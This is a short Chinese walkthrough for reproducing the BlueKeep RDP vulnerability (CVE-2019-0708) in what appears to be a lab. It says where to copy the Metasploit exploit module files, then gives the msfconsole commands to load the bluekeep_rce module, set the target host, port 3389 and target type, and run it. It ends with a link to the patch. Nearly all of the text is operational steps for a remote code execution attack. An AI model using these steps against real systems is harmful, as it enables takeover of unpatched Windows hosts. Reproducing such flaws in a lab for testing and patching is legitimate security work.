CVE-2019-0708漏洞复现
环境准备
配置exp
攻击套件放到msf对应位置,如存在,请覆盖。如下对应地址
1 2 3 4 5 6 7
| rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
|
运行
1 2 3 4
| 进入程序:msfconsole 重载:reload_all 启用0708攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 查看配置:info
|
1 2 3 4 5 6 7 8 9 10
| 设置RHOSTS、RPOTRT、target target有0-4,设置成自己对应的
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 10.211.55.3 RHOSTS => 10.211.55.3 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RPORT 3389 RPORT => 3389 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1 target => 1 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
|
漏洞修复补丁
Download